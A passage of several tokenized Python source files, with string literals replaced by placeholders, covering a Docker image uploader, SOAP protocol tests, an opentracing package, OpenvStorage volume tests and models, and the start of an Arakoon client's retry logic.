'<STR_LIT:path>' : self . input_path } ) <EOL> else : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> log . info ( msg ) </s>
<s> import abc <EOL> import logging <EOL> import six <EOL> from docker import Client <EOL> from tripleo_common . image . base import BaseImageManager <EOL> from tripleo_common . image . exception import ImageUploaderException <EOL> class ImageUploadManager ( BaseImageManager ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ + '<STR_LIT>' ) <EOL> def __init__ ( self , config_files , verbose = False , debug = False ) : <EOL> super ( ImageUploadManager , self ) . __init__ ( config_files ) <EOL> def upload ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . info ( '<STR_LIT>' % self . config_files ) <EOL> upload_images = self . load_config_files ( self . CONFIG_SECTIONS [ <NUM_LIT:1> ] ) <EOL> for item in upload_images : <EOL> image_name = item . get ( '<STR_LIT>' ) <EOL> uploader = item . get ( '<STR_LIT>' ) <EOL> pull_source = item . get ( '<STR_LIT>' ) <EOL> push_destination = item . get ( '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT>' % image_name ) <EOL> uploader = ImageUploader . get_uploader ( uploader ) <EOL> uploader . upload_image ( image_name , pull_source , push_destination ) <EOL> return upload_images <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class ImageUploader ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def get_uploader ( uploader ) : <EOL> if uploader == '<STR_LIT>' : <EOL> return DockerImageUploader ( ) <EOL> raise ImageUploaderException ( '<STR_LIT>' ) <EOL> @ abc . abstractmethod <EOL> def upload_image ( self , image_name , pull_source , push_destination ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DockerImageUploader ( ImageUploader ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ + '<STR_LIT>' ) <EOL> def upload_image ( self , image_name , pull_source , push_destination ) : <EOL> dockerc = Client ( base_url = '<STR_LIT>' ) <EOL> image = image_name . rpartition ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> tag = image_name . rpartition ( '<STR_LIT::>' ) [ <NUM_LIT:2> ] <EOL> repo = pull_source + '<STR_LIT:/>' + image <EOL> response = [ line for line in dockerc . pull ( repo , <EOL> tag = tag , stream = True , insecure_registry = True ) ] <EOL> self . logger . debug ( response ) <EOL> full_image = repo + '<STR_LIT::>' + tag <EOL> new_repo = push_destination + '<STR_LIT:/>' + image <EOL> response = dockerc . tag ( image = full_image , repository = new_repo , <EOL> tag = tag , force = True ) <EOL> self . logger . debug ( response ) <EOL> response = [ line for line in dockerc . push ( new_repo , <EOL> tag = tag , stream = True , insecure_registry = True ) ] <EOL> self . logger . debug ( response ) <EOL> self . logger . info ( '<STR_LIT>' % image_name ) </s>
<s> import setuptools <EOL> setuptools . setup ( <EOL> setup_requires = [ '<STR_LIT>' ] , <EOL> pbr = True , <EOL> ) </s>
<s> from setuptools import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package = [ '<STR_LIT>' ] ) </s>
<s> from wsme import types <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> def getdesc ( root , host_url = '<STR_LIT>' ) : <EOL> methods = { } <EOL> for path , funcdef in root . getapi ( ) : <EOL> method = funcdef . extra_options . get ( '<STR_LIT>' , None ) <EOL> name = '<STR_LIT:_>' . join ( path ) <EOL> if method is not None : <EOL> path = path [ : - <NUM_LIT:1> ] <EOL> else : <EOL> method = '<STR_LIT:GET>' <EOL> for argdef in funcdef . arguments : <EOL> if types . iscomplex ( argdef . datatype ) or types . isarray ( argdef . datatype ) or types . isdict ( argdef . datatype ) : <EOL> method = '<STR_LIT:POST>' <EOL> break <EOL> required_params = [ ] <EOL> optional_params = [ ] <EOL> for argdef in funcdef . arguments : <EOL> if method == '<STR_LIT:GET>' and argdef . mandatory : <EOL> required_params . append ( argdef . name ) <EOL> else : <EOL> optional_params . append ( argdef . name ) <EOL> methods [ name ] = { <EOL> '<STR_LIT>' : method , <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' . join ( path ) <EOL> } <EOL> if required_params : <EOL> methods [ name ] [ '<STR_LIT>' ] = required_params <EOL> if optional_params : <EOL> methods [ name ] [ '<STR_LIT>' ] = optional_params <EOL> if funcdef . doc : <EOL> methods [ name ] [ '<STR_LIT>' ] = funcdef . doc <EOL> formats = [ ] <EOL> for p in root . protocols : <EOL> if p . name == '<STR_LIT>' : <EOL> formats . append ( '<STR_LIT>' ) <EOL> if p . name == '<STR_LIT>' : <EOL> formats . append ( '<STR_LIT>' ) <EOL> api = { <EOL> '<STR_LIT>' : host_url + root . _webpath , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : getattr ( root , '<STR_LIT:name>' , '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : methods <EOL> } <EOL> return json . dumps ( api , indent = <NUM_LIT:4> ) </s>
<s> import decimal <EOL> import datetime <EOL> import base64 <EOL> import six <EOL> import wsme . tests . protocol <EOL> try : <EOL> import xml . etree . ElementTree as et <EOL> except : <EOL> import cElementTree as et <EOL> import suds . cache <EOL> import suds . client <EOL> import suds . transport <EOL> import wsme . utils <EOL> class XDecimal ( suds . xsd . sxbuiltin . XBuiltin ) : <EOL> def translate ( self , value , topython = True ) : <EOL> if topython : <EOL> if isinstance ( value , six . string_types ) and len ( value ) : <EOL> return decimal . Decimal ( value ) <EOL> else : <EOL> if isinstance ( value , ( decimal . Decimal , int , float ) ) : <EOL> return str ( value ) <EOL> return value <EOL> suds . xsd . sxbuiltin . Factory . tags [ '<STR_LIT>' ] = XDecimal <EOL> class WebtestSudsTransport ( suds . transport . Transport ) : <EOL> def __init__ ( self , app ) : <EOL> suds . transport . Transport . __init__ ( self ) <EOL> self . app = app <EOL> def open ( self , request ) : <EOL> res = self . app . get ( request . url , headers = request . headers ) <EOL> return six . BytesIO ( res . body ) <EOL> def send ( self , request ) : <EOL> res = self . app . post ( <EOL> request . url , <EOL> request . message , <EOL> headers = dict ( ( <EOL> ( key , str ( value ) ) for key , value in request . headers . items ( ) <EOL> ) ) , <EOL> expect_errors = True <EOL> ) <EOL> return suds . transport . Reply ( <EOL> res . status_int , <EOL> dict ( res . headers ) , <EOL> res . body <EOL> ) <EOL> class SudsCache ( suds . cache . Cache ) : <EOL> def __init__ ( self ) : <EOL> self . d = { } <EOL> def get ( self , id ) : <EOL> return self . d . get ( id ) <EOL> def getf ( self , id ) : <EOL> b = self . get ( id ) <EOL> if b is not None : <EOL> return six . StringIO ( self . get ( id ) ) <EOL> def put ( self , id , bfr ) : <EOL> self . d [ id ] = bfr <EOL> def putf ( self , id , fp ) : <EOL> self . put ( id , fp . read ( ) ) <EOL> def purge ( self , id ) : <EOL> try : <EOL> del self . d [ id ] <EOL> except : <EOL> pass <EOL> def clear ( self , id ) : <EOL> self . d = { } <EOL> sudscache = SudsCache ( ) <EOL> tns = "<STR_LIT>" <EOL> typenamespace = "<STR_LIT>" <EOL> soapenv_ns = '<STR_LIT>' <EOL> xsi_ns = '<STR_LIT>' <EOL> body_qn = '<STR_LIT>' % soapenv_ns <EOL> fault_qn = '<STR_LIT>' % soapenv_ns <EOL> faultcode_qn = '<STR_LIT>' % soapenv_ns <EOL> faultstring_qn = '<STR_LIT>' % soapenv_ns <EOL> faultdetail_qn = '<STR_LIT>' % soapenv_ns <EOL> type_qn = '<STR_LIT>' % xsi_ns <EOL> nil_qn = '<STR_LIT>' % xsi_ns <EOL> def build_soap_message ( method , params = "<STR_LIT>" ) : <EOL> message = """<STR_LIT>""" % dict ( method = method , params = params , typenamespace = typenamespace ) <EOL> return message <EOL> python_types = { <EOL> int : ( '<STR_LIT>' , str ) , <EOL> float : ( '<STR_LIT>' , str ) , <EOL> bool : ( '<STR_LIT>' , str ) , <EOL> wsme . types . bytes : ( <EOL> '<STR_LIT>' , <EOL> lambda x : x . decode ( '<STR_LIT:ascii>' ) if isinstance ( x , wsme . types . bytes ) else x <EOL> ) , <EOL> wsme . types . text : ( '<STR_LIT>' , wsme . types . text ) , <EOL> wsme . types . binary : ( <EOL> '<STR_LIT>' , <EOL> lambda x : base64 . encodestring ( x ) . decode ( '<STR_LIT:ascii>' ) <EOL> ) , <EOL> decimal . Decimal : ( '<STR_LIT>' , str ) , <EOL> datetime . date : ( '<STR_LIT>' , datetime . date . isoformat ) , <EOL> datetime . time : ( '<STR_LIT>' , datetime . time . isoformat ) , <EOL> datetime . datetime : ( '<STR_LIT>' , datetime . datetime . isoformat ) , <EOL> } <EOL> array_types = { <EOL> wsme . types . bytes : "<STR_LIT>" , <EOL> wsme . types . text : "<STR_LIT>" , <EOL> int : "<STR_LIT>" , <EOL> float : "<STR_LIT>" , <EOL> bool : "<STR_LIT>" , <EOL> datetime . datetime : "<STR_LIT>" <EOL> } <EOL> if not six . PY3 : <EOL> array_types [ long ] = "<STR_LIT>" <EOL> def tosoap ( tag , value ) : <EOL> el = et . Element ( tag ) <EOL> if isinstance ( value , tuple ) : <EOL> value , datatype = value <EOL> else : <EOL> datatype = type ( value ) <EOL> if value is None : <EOL> el . set ( '<STR_LIT>' , '<STR_LIT:true>' ) <EOL> return el <EOL> if datatype in python_types : <EOL> stype , conv = python_types [ datatype ] <EOL> el . text = conv ( value ) <EOL> el . set ( '<STR_LIT>' , stype ) <EOL> el . text = str ( value ) <EOL> return el <EOL> def tosuds ( client , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , tuple ) : <EOL> value , datatype = value <EOL> else : <EOL> datatype = type ( value ) <EOL> if value is None : <EOL> return None <EOL> if isinstance ( datatype , list ) : <EOL> if datatype [ <NUM_LIT:0> ] in array_types : <EOL> tname = array_types [ datatype [ <NUM_LIT:0> ] ] <EOL> else : <EOL> tname = datatype [ <NUM_LIT:0> ] . __name__ + '<STR_LIT>' <EOL> o = client . factory . create ( '<STR_LIT>' + tname ) <EOL> o . item = [ tosuds ( client , ( item , datatype [ <NUM_LIT:0> ] ) ) for item in value ] <EOL> return o <EOL> elif datatype in python_types : <EOL> return python_types [ datatype ] [ <NUM_LIT:1> ] ( value ) <EOL> else : <EOL> o = client . factory . create ( '<STR_LIT>' + datatype . __name__ ) <EOL> for attr in datatype . _wsme_attributes : <EOL> if attr . name in value : <EOL> setattr ( <EOL> o , attr . name , <EOL> tosuds ( client , ( value [ attr . name ] , attr . datatype ) ) <EOL> ) <EOL> return o <EOL> def read_bool ( value ) : <EOL> return value == '<STR_LIT:true>' <EOL> soap_types = { <EOL> '<STR_LIT>' : wsme . types . text , <EOL> '<STR_LIT>' : int , <EOL> '<STR_LIT>' : int if six . PY3 else long , <EOL> '<STR_LIT>' : float , <EOL> '<STR_LIT>' : decimal . Decimal , <EOL> '<STR_LIT>' : read_bool , <EOL> '<STR_LIT>' : wsme . utils . parse_isodate , <EOL> '<STR_LIT>' : wsme . utils . parse_isotime , <EOL> '<STR_LIT>' : wsme . utils . parse_isodatetime , <EOL> '<STR_LIT>' : base64 . decodestring , <EOL> } <EOL> def fromsoap ( el ) : <EOL> if el . get ( nil_qn ) == '<STR_LIT:true>' : <EOL> return None <EOL> t = el . get ( type_qn ) <EOL> if t == '<STR_LIT>' : <EOL> return wsme . types . text ( el . text if el . text else '<STR_LIT>' ) <EOL> if t in soap_types : <EOL> return soap_types [ t ] ( el . text ) <EOL> elif t and t . endswith ( '<STR_LIT>' ) : <EOL> return [ fromsoap ( i ) for i in el ] <EOL> else : <EOL> d = { } <EOL> for child in el : <EOL> name = child . tag <EOL> assert name . startswith ( '<STR_LIT>' % typenamespace ) , name <EOL> name = name [ len ( typenamespace ) + <NUM_LIT:2> : ] <EOL> d [ name ] = fromsoap ( child ) <EOL> return d <EOL> def tobytes ( value ) : <EOL> if isinstance ( value , wsme . types . text ) : <EOL> value = value . encode ( ) <EOL> return value <EOL> def tobin ( value ) : <EOL> value = base64 . decodestring ( value . encode ( ) ) <EOL> return value <EOL> fromsuds_types = { <EOL> wsme . types . binary : tobin , <EOL> wsme . types . bytes : tobytes , <EOL> decimal . Decimal : decimal . Decimal , <EOL> } <EOL> def fromsuds ( dt , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( dt , list ) : <EOL> return [ fromsuds ( dt [ <NUM_LIT:0> ] , item ) for item in value . item ] <EOL> if wsme . types . isarray ( dt ) : <EOL> return [ fromsuds ( dt . item_type , item ) for item in value . item ] <EOL> if wsme . types . isusertype ( dt ) and dt not in fromsuds_types : <EOL> dt = dt . basetype <EOL> if dt in fromsuds_types : <EOL> print ( dt , value ) <EOL> value = fromsuds_types [ dt ] ( value ) <EOL> print ( value ) <EOL> return value <EOL> if wsme . types . iscomplex ( dt ) : <EOL> d = { } <EOL> for attrdef in dt . _wsme_attributes : <EOL> if not hasattr ( value , attrdef . name ) : <EOL> continue <EOL> d [ attrdef . name ] = fromsuds ( <EOL> attrdef . datatype , getattr ( value , attrdef . name ) <EOL> ) <EOL> return d <EOL> return value <EOL> class TestSOAP ( wsme . tests . protocol . ProtocolTestCase ) : <EOL> protocol = '<STR_LIT>' <EOL> protocol_options = dict ( tns = tns , typenamespace = typenamespace ) <EOL> ws_path = '<STR_LIT:/>' <EOL> _sudsclient = None <EOL> def setUp ( self ) : <EOL> wsme . tests . protocol . ProtocolTestCase . setUp ( self ) <EOL> def test_simple_call ( self ) : <EOL> message = build_soap_message ( '<STR_LIT>' ) <EOL> print ( message ) <EOL> res = self . app . post ( <EOL> self . ws_path , <EOL> message , <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } , <EOL> expect_errors = True <EOL> ) <EOL> print ( res . body ) <EOL> assert res . status . startswith ( '<STR_LIT>' ) <EOL> def call ( self , fpath , _rt = None , _accept = None , _no_result_decode = False , <EOL> ** kw ) : <EOL> if _no_result_decode or _accept or self . _testMethodName in ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) : <EOL> return self . raw_call ( fpath , _rt , _accept , _no_result_decode , ** kw ) <EOL> path = fpath . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> m = getattr ( self . sudsclient . service , methodname ) <EOL> kw = dict ( ( <EOL> ( key , tosuds ( self . sudsclient , value ) ) for key , value in kw . items ( ) <EOL> ) ) <EOL> print ( kw ) <EOL> try : <EOL> return fromsuds ( _rt , m ( ** kw ) ) <EOL> except suds . WebFault as exc : <EOL> raise wsme . tests . protocol . CallException ( <EOL> exc . fault . faultcode , <EOL> exc . fault . faultstring , <EOL> getattr ( exc . fault , '<STR_LIT>' , None ) or None <EOL> ) <EOL> def raw_call ( self , fpath , _rt = None , _accept = None , _no_result_decode = False , <EOL> ** kw ) : <EOL> path = fpath . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> if kw : <EOL> el = et . Element ( '<STR_LIT>' ) <EOL> for key , value in kw . items ( ) : <EOL> el . append ( tosoap ( key , value ) ) <EOL> params = six . b ( "<STR_LIT:\n>" ) . join ( et . tostring ( el ) for el in el ) <EOL> else : <EOL> params = "<STR_LIT>" <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> message = build_soap_message ( methodname , params ) <EOL> print ( message ) <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } <EOL> if _accept is not None : <EOL> headers [ '<STR_LIT>' ] = _accept <EOL> res = self . app . post ( <EOL> self . ws_path , <EOL> message , <EOL> headers = headers , <EOL> expect_errors = True <EOL> ) <EOL> print ( "<STR_LIT>" , res . status , "<STR_LIT>" , res . body ) <EOL> if _no_result_decode : <EOL> return res <EOL> el = et . fromstring ( res . body ) <EOL> body = el . find ( body_qn ) <EOL> print ( body ) <EOL> if res . status_int == <NUM_LIT:200> : <EOL> response_tag = '<STR_LIT>' % ( typenamespace , methodname ) <EOL> r = body . find ( response_tag ) <EOL> result = r . find ( '<STR_LIT>' % typenamespace ) <EOL> print ( "<STR_LIT>" , result ) <EOL> return fromsoap ( result ) <EOL> elif res . status_int == <NUM_LIT> : <EOL> fault = body . find ( fault_qn ) <EOL> raise wsme . tests . protocol . CallException ( <EOL> fault . find ( faultcode_qn ) . text , <EOL> fault . find ( faultstring_qn ) . text , <EOL> "<STR_LIT>" ) <EOL> elif res . status_int == <NUM_LIT> : <EOL> fault = body . find ( fault_qn ) <EOL> raise wsme . tests . protocol . CallException ( <EOL> fault . find ( faultcode_qn ) . text , <EOL> fault . find ( faultstring_qn ) . text , <EOL> fault . find ( faultdetail_qn ) is not None and <EOL> fault . find ( faultdetail_qn ) . text or None ) <EOL> @ property <EOL> def sudsclient ( self ) : <EOL> if self . _sudsclient is None : <EOL> self . _sudsclient = suds . client . Client ( <EOL> self . ws_path + '<STR_LIT>' , <EOL> transport = WebtestSudsTransport ( self . app ) , <EOL> cache = sudscache <EOL> ) <EOL> return self . _sudsclient <EOL> def test_wsdl ( self ) : <EOL> c = self . sudsclient <EOL> assert c . wsdl . tns [ <NUM_LIT:1> ] == tns , c . wsdl . tns <EOL> sd = c . sd [ <NUM_LIT:0> ] <EOL> assert len ( sd . ports ) == <NUM_LIT:1> <EOL> port , methods = sd . ports [ <NUM_LIT:0> ] <EOL> self . assertEqual ( len ( methods ) , <NUM_LIT> ) <EOL> methods = dict ( methods ) <EOL> assert '<STR_LIT>' in methods <EOL> print ( methods ) <EOL> assert methods [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:value>' <EOL> def test_return_nesteddict ( self ) : <EOL> pass <EOL> def test_setnesteddict ( self ) : <EOL> pass <EOL> def test_return_objectdictattribute ( self ) : <EOL> pass <EOL> def test_setnested_nullobj ( self ) : <EOL> pass </s>
<s> from __future__ import absolute_import <EOL> from . span import Span <EOL> from . span import start_child_span <EOL> from . span import canonicalize_baggage_key <EOL> from . tracer import Tracer <EOL> from . propagation import Format <EOL> from . propagation import InvalidCarrierException <EOL> from . propagation import TraceCorruptedException <EOL> from . propagation import UnsupportedFormatException <EOL> tracer = Tracer ( ) </s>
<s> """<STR_LIT>""" <EOL> from ovs_common import OVSPluginTestCase , VPOOL_MOUNTPOINT , cinder_client_exceptions <EOL> class OVSPluginProtectionTestCase ( OVSPluginTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_allowed_to_delete_volume_with_clones ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _debug ( '<STR_LIT>' ) <EOL> volume , volume_name , file_name = self . _new_volume ( ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> clone , clone_name , clone_file_name = self . _new_volume_from_volume ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name ) , '<STR_LIT>' ) <EOL> self . assertRaises ( RuntimeError , self . _remove_volume , volume , volume_name , <NUM_LIT:5> ) <EOL> self . _cinder_reset_volume_state ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( clone , clone_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( volume , volume_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _debug ( '<STR_LIT>' ) <EOL> def test_not_allowed_to_delete_clone_of_snapshot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _debug ( '<STR_LIT>' ) <EOL> volume , volume_name , file_name = self . _new_volume ( ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> snapshot , snap_name = self . _new_snapshot ( volume ) <EOL> cinder_snapshots = self . _cinder_list_snapshots ( ) <EOL> self . assertTrue ( snapshot . id in cinder_snapshots . keys ( ) , '<STR_LIT>' ) <EOL> snapshot_name = cinder_snapshots [ snapshot . id ] <EOL> self . assertTrue ( snapshot_name == snap_name , '<STR_LIT>' % snapshot_name ) <EOL> self . assertTrue ( self . _ovs_snapshot_id_in_vdisklist_snapshots ( snapshot . id ) , '<STR_LIT>' ) <EOL> clone , clone_name , clone_file_name = self . _new_volume_from_snapshot ( snapshot ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name ) , '<STR_LIT>' ) <EOL> self . assertRaises ( cinder_client_exceptions . BadRequest , self . _remove_volume , volume , volume_name , <NUM_LIT:5> ) <EOL> self . _cinder_reset_volume_state ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> self . assertRaises ( RuntimeError , self . _remove_snapshot , snap_name , snapshot , <NUM_LIT:5> ) <EOL> self . _cinder_reset_snapshot_state ( snapshot ) <EOL> cinder_snapshots = self . _cinder_list_snapshots ( ) <EOL> self . assertTrue ( snapshot . id in cinder_snapshots . keys ( ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( clone , clone_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _remove_snapshot ( snap_name , snapshot , force = True ) <EOL> cinder_snapshots = self . _cinder_list_snapshots ( ) <EOL> self . assertFalse ( snapshot . id in cinder_snapshots . keys ( ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( volume , volume_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _debug ( '<STR_LIT>' ) <EOL> def test_not_allowed_to_delete_volume_local_mounted ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _debug ( '<STR_LIT>' ) <EOL> volume , volume_name , file_name = self . _new_volume_from_default_image ( ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> self . _mount_volume_by_filename ( file_name ) <EOL> self . assertRaises ( RuntimeError , self . _remove_volume , volume , volume_name , <NUM_LIT:5> ) <EOL> self . _cinder_reset_volume_state ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> self . _umount_volume ( file_name ) <EOL> self . _remove_volume ( volume , volume_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _debug ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from ovs . dal . dataobject import DataObject <EOL> from ovs . dal . structures import Property , Relation , Dynamic <EOL> from ovs . dal . hybrids . mgmtcenter import MgmtCenter <EOL> from ovs . extensions . hypervisor . factory import Factory <EOL> class PMachine ( DataObject ) : <EOL> """<STR_LIT>""" <EOL> __properties = { Property ( '<STR_LIT:name>' , str , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT:description>' , str , mandatory = False , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT:username>' , str , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT:password>' , str , mandatory = False , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT>' , str , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , doc = '<STR_LIT>' ) , <EOL> Property ( '<STR_LIT>' , str , mandatory = False , doc = '<STR_LIT>' ) } <EOL> __relations = [ Relation ( '<STR_LIT>' , MgmtCenter , '<STR_LIT>' , mandatory = False ) ] <EOL> __dynamics = [ Dynamic ( '<STR_LIT>' , str , <NUM_LIT> ) ] <EOL> def _host_status ( self ) : <EOL> """<STR_LIT>""" <EOL> mgmtcentersdk = Factory . get_mgmtcenter ( self ) <EOL> if mgmtcentersdk : <EOL> if self . hypervisor_id : <EOL> return mgmtcentersdk . get_host_status_by_pk ( self . hypervisor_id ) <EOL> if self . ip : <EOL> return mgmtcentersdk . get_host_status_by_ip ( self . ip ) <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from ovs . dal . datalist import DataList <EOL> from ovs . dal . hybrids . mgmtcenter import MgmtCenter <EOL> class MgmtCenterList ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def get_mgmtcenters ( ) : <EOL> """<STR_LIT>""" <EOL> return DataList ( MgmtCenter , { '<STR_LIT:type>' : DataList . where_operator . AND , <EOL> '<STR_LIT>' : [ ] } ) <EOL> @ staticmethod <EOL> def get_by_ip ( ip ) : <EOL> """<STR_LIT>""" <EOL> mgmtcenters = DataList ( MgmtCenter , { '<STR_LIT:type>' : DataList . where_operator . AND , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , DataList . operator . EQUALS , ip ) ] } ) <EOL> if len ( mgmtcenters ) > <NUM_LIT:0> : <EOL> return mgmtcenters [ <NUM_LIT:0> ] <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> import sys <EOL> import time <EOL> import random <EOL> import threading <EOL> from ArakoonProtocol import * <EOL> from ArakoonProtocol import _packBool <EOL> from ArakoonExceptions import * <EOL> from ArakoonClientConnection import * <EOL> from ArakoonValidators import SignatureValidator <EOL> from ArakoonProtocol import ArakoonClientConfig <EOL> from functools import wraps <EOL> import utils <EOL> FILTER = '<STR_LIT>' . join ( [ ( len ( repr ( chr ( x ) ) ) == <NUM_LIT:3> ) and chr ( x ) or '<STR_LIT:.>' for x in range ( <NUM_LIT> ) ] ) <EOL> def dump ( src , length = <NUM_LIT:8> ) : <EOL> N = <NUM_LIT:0> <EOL> result = '<STR_LIT>' <EOL> while src : <EOL> s , src = src [ : length ] , src [ length : ] <EOL> hexa = '<STR_LIT:U+0020>' . join ( [ "<STR_LIT>" % ord ( x ) for x in s ] ) <EOL> s = s . translate ( FILTER ) <EOL> result += "<STR_LIT>" % ( N , length * <NUM_LIT:3> , hexa , s ) <EOL> N += length <EOL> return result <EOL> random . seed ( time . time ( ) ) <EOL> def retryDuringMasterReelection ( is_read_only = False ) : <EOL> def wrap ( f ) : <EOL> @ wraps ( f ) <EOL> def retrying_f ( self , * args , ** kwargs ) : <EOL> start = time . time ( ) <EOL> tryCount = <NUM_LIT:0.0> <EOL> backoffPeriod = <NUM_LIT> <EOL> callSucceeded = False <EOL> retryPeriod = ArakoonClientConfig . getNoMasterRetryPeriod ( ) <EOL> deadline = start + retryPeriod <EOL> while ( not callSucceeded and time . time ( ) < deadline ) : <EOL> try : <EOL> retVal = f ( self , * args , ** kwargs ) <EOL> callSucceeded = True <EOL> except ( ArakoonNoMaster , ArakoonNodeNotMaster , ArakoonSocketException , ArakoonNotConnected , ArakoonGoingDown ) as ex : <EOL> if not is_read_only and isinstance ( ex , ( ArakoonSocketException , ArakoonGoingDown ) ) : <EOL> raise <EOL> if len ( self . _config . getNodes ( ) . keys ( ) ) == <NUM_LIT:0> : <EOL> raise ArakoonInvalidConfig ( "<STR_LIT>" ) <EOL> self . _masterId = None <EOL> self . dropConnections ( ) <EOL> sleepPeriod = 